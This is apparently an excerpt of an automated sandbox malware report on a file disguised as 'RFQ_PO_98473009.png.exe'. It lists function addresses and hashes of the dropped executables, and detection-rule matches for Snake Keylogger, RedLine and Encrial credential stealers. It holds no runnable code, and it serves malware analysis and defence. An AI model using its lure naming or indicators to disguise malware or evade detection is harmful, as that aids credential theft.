                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642B94812_2_0642B948
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642405012_2_06424050
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06428E5012_2_06428E50
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642FC5012_2_0642FC50
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642125012_2_06421250
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642E45012_2_0642E450
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642B95812_2_0642B958
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642295812_2_06422958
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642765912_2_06427659
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642126012_2_06421260
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642E46012_2_0642E460
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642A16A12_2_0642A16A
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642766812_2_06427668
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642A17012_2_0642A170
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06425E7012_2_06425E70
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642497112_2_06424971
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642CC7812_2_0642CC78
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642327812_2_06423278
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642897812_2_06428978
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642F77912_2_0642F779
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642680212_2_06426802
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642AB0012_2_0642AB00
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642000612_2_06420006
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642D60812_2_0642D608
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642930812_2_06429308
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642681012_2_06426810
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642371012_2_06423710
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642E91A12_2_0642E91A
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642931812_2_06429318
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642201812_2_06422018
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642501812_2_06425018
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642BE1E12_2_0642BE1E
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642372012_2_06423720
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642BE2012_2_0642BE20
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642092012_2_06420920
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06427B2012_2_06427B20
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642E92812_2_0642E928
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642202812_2_06422028
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642A62812_2_0642A628
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642093012_2_06420930
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06427B3012_2_06427B30
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642D13112_2_0642D131
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642A63812_2_0642A638
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642633812_2_06426338
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064224C012_2_064224C0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064284C012_2_064284C0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642DAC012_2_0642DAC0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06424FC112_2_06424FC1
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06420DC812_2_06420DC8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642AFC812_2_0642AFC8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06426CC812_2_06426CC8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064204C912_2_064204C9
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642DAD012_2_0642DAD0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064297D012_2_064297D0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064204D812_2_064204D8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06426CD812_2_06426CD8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064244D912_2_064244D9
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06422DE212_2_06422DE2
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064297E012_2_064297E0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642EDE012_2_0642EDE0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064254E112_2_064254E1
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642C2E612_2_0642C2E6
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064244E812_2_064244E8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642C2E812_2_0642C2E8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06427FE812_2_06427FE8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064216E912_2_064216E9
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642EDF012_2_0642EDF0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064254F012_2_064254F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06422DF012_2_06422DF0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642AAF012_2_0642AAF0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064216F812_2_064216F8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06427FF812_2_06427FF8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642D5F812_2_0642D5F8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642B48212_2_0642B482
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06425E8012_2_06425E80
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642498012_2_06424980
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06421B8012_2_06421B80
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642328812_2_06423288
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642898812_2_06428988
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642F78812_2_0642F788
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642DF8812_2_0642DF88
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06421B9012_2_06421B90
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642B49012_2_0642B490
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642719012_2_06427190
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642DF9812_2_0642DF98
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06429C9812_2_06429C98
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064271A012_2_064271A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642C7A012_2_0642C7A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06429CA812_2_06429CA8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06423BA812_2_06423BA8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064259A912_2_064259A9
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642C7B012_2_0642C7B0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064224B012_2_064224B0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642F2B012_2_0642F2B0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064284B112_2_064284B1
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06420DBA12_2_06420DBA
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06423BB812_2_06423BB8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064259B812_2_064259B8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0642AFB812_2_0642AFB8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645E81812_2_0645E818
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645715012_2_06457150
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06459D1012_2_06459D10
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645EB3812_2_0645EB38
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064509D012_2_064509D0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645004012_2_06450040
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645BC5012_2_0645BC50
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06458A5012_2_06458A50
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645EE5812_2_0645EE58
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645A67012_2_0645A670
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645747012_2_06457470
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645D87012_2_0645D870
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645841012_2_06458410
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645B61012_2_0645B610
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645001D12_2_0645001D
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645A03012_2_0645A030
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645D23012_2_0645D230
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064596D012_2_064596D0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645C8D012_2_0645C8D0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645FAD812_2_0645FAD8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645B2E112_2_0645B2E1
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645B2F012_2_0645B2F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064580F012_2_064580F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064504F812_2_064504F8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645E4F812_2_0645E4F8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645909012_2_06459090
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645C29012_2_0645C290
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645F49812_2_0645F498
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645ACB012_2_0645ACB0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06457AB012_2_06457AB0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645DEB812_2_0645DEB8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645D55012_2_0645D550
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645A35012_2_0645A350
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06458D7012_2_06458D70
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645BF7012_2_0645BF70
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645F17812_2_0645F178
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645050812_2_06450508
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645CF1012_2_0645CF10
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645872212_2_06458722
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645B93012_2_0645B930
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645873012_2_06458730
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064509C112_2_064509C1
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645E1C912_2_0645E1C9
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645AFD012_2_0645AFD0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06457DD012_2_06457DD0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645E1D812_2_0645E1D8
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe 7799DAC5FDF78F132FA4F65DD31ABE052CB68EEB17EDA71E63A0365077C6DE15
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Native_snake01.exe F3206DA0BBB65CBE611245A9C3CE4A6EC550A3203BE4C2F0D4766DCE1959ADD1
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: String function: 0040E1D8 appears 44 times
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: String function: 0040E1D8 appears 44 times
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1232343158.0000000005B70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs RFQ_PO_98473009.png.exe
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1223205034.00000000033D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs RFQ_PO_98473009.png.exe
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1234608709.000000000796B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePoweo3 vs RFQ_PO_98473009.png.exe
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1235346180.0000000007A10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs RFQ_PO_98473009.png.exe
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1221380126.000000000147E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ_PO_98473009.png.exe
                      Source: RFQ_PO_98473009.png.exe, 00000009.00000002.1205717774.0000000002780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs RFQ_PO_98473009.png.exe
                      Source: RFQ_PO_98473009.png.exe, 00000009.00000002.1205717774.0000000002780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs RFQ_PO_98473009.png.exe
                      Source: RFQ_PO_98473009.png.exeBinary or memory string: OriginalFilenamehpLp.exe2 vs RFQ_PO_98473009.png.exe
                      Source: RFQ_PO_98473009.png.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 18.2.Native_New-Nova.exe.50c0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.50c0000.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 18.2.Native_New-Nova.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 10.2.Native_New-Nova.exe.21b2746.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.21b2746.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 18.2.Native_New-Nova.exe.3510190.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.3510190.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 18.2.Native_New-Nova.exe.223183e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.4a60f08.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.223183e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 18.2.Native_New-Nova.exe.4a60f08.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.0.Native_snake01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 10.2.Native_New-Nova.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 18.2.Native_New-Nova.exe.223183e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.223183e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.49c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.Native_snake01.exe.49c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.49c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 18.2.Native_New-Nova.exe.3510190.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.3510190.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
